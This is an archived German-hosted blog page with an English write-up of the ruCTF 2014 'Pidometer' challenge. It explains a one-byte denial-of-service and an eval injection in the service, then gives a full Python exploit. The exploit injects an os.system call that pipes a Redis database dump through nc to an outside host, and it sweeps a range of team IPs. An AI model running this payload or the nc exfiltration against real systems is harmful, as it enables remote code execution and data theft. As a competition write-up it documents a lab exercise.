πŸ’Ύ Archived View for airmack.de β€Ί single β€Ί 583237b4a98a84f255a34164e3b60315039e21eb363b1be3104ef238a9… captured on 2023-04-26 at 13:10:54. Gemini links have been rewritten to link to archived content

View Raw

More Information

⬅️ Previous capture (2021-12-17)

-=-=-=-=-=-=-


β–‘β–ˆβ–€β–ˆβ–‘β–€β–ˆβ–€β–‘β–ˆβ–€β–„β–‘β–ˆβ–„β–ˆβ–‘β–ˆβ–€β–ˆβ–‘β–ˆβ–€β–€β–‘β–ˆβ–‘β–ˆβ–‘β–‘β–‘β–‘β–ˆβ–€β–„β–‘β–ˆβ–€β–€
β–‘β–ˆβ–€β–ˆβ–‘β–‘β–ˆβ–‘β–‘β–ˆβ–€β–„β–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–€β–ˆβ–‘β–ˆβ–‘β–‘β–‘β–ˆβ–€β–„β–‘β–‘β–‘β–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–€β–€
β–‘β–€β–‘β–€β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–‘β–€β–€β–‘β–‘β–€β–€β–€


ruCTF 2014(Pidometer) writeup

Aus der Kategorie Hacking

Begin

The server application was divided into two parts, a c-file (network.c) and a few python function encapsulated in server. The first obvious error in the c-code was that the parameter-parsing was broken and the service could be brought down (DOS) simply by sending a one byte message containing '

'. In the first half of the CTF this was used to defect other teams services, meaning that no other team could score flags or submit flags. This was later on changed, after we had a working exploit. The python function pp was using an aliased eval, which could be triggered by sending more than 34 characters. This lead to arbitrary code execution and a fully compromised machine, e.g. through a backconnect shell. The function pp was called when walking the 'add' path in the c-file. For gathering flags, one could just use 'strings /opt/db.rdb' and pipe it over a nc connection to a flag submit service, as the flags are stored in the redis database. An exploit could look like this:

Code


#!/usr/bin/env python2
import socket
import sys


def read_until(s, token):
  data = ""
  while True:
    tmp = s.recv(4096)
    print tmp
    if not tmp:
      s.close()
      return
    data += tmp
    if token in data:
      return


def backdoorinject(target):
  s = socket.socket()
  s.connect((target, 27))

  read_until(s, "maths!")

  shellcmd = r"strings\x20/opt/db.rdb\x20|\x20nc\x20$IP$\x20$PORT$"
  payload = (
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa__import__('os').system('%s')" % shellcmd
  )
  s.sendall("add user " + payload + "\n")
  print s.recv(4096)

  s.close()


targets = range(1, 254)
socket.setdefaulttimeout(1)
for i in targets:
  if i == 41: ##own ip
    continue
  try:
    hostname = "10.60." + str(i) + ".7" # The remote host
    print hostname,
    backdoorinject(hostname)
    print " send"
  except:
    print "...failed"
    pass


Latest article

Fix for zfs-dkms-git in arch for kernel 5.15.7 erstellt am 11. December 2021

Project gemini erstellt am 13. Februar 2021

Eat Sleep PWN Repeat erstellt am 07. Dezember 2020

Physico-chemically motivated parameterization and modelling of real-time capable lithium-ion battery models: a case study on the Tesla Model S battery erstellt am 06. Dezember 2020

Breaking out of cisco anyconnect no local network restriction erstellt am 8. April 2018

Insomni Hack 2015(Lost In Memories) writeup erstellt am 23. Maerz 2014

ruCTF 2014(Pidometer) writeup erstellt am 21. Dezember 2014

Footer

Hauptseite

Impressum

Übersicht

Bio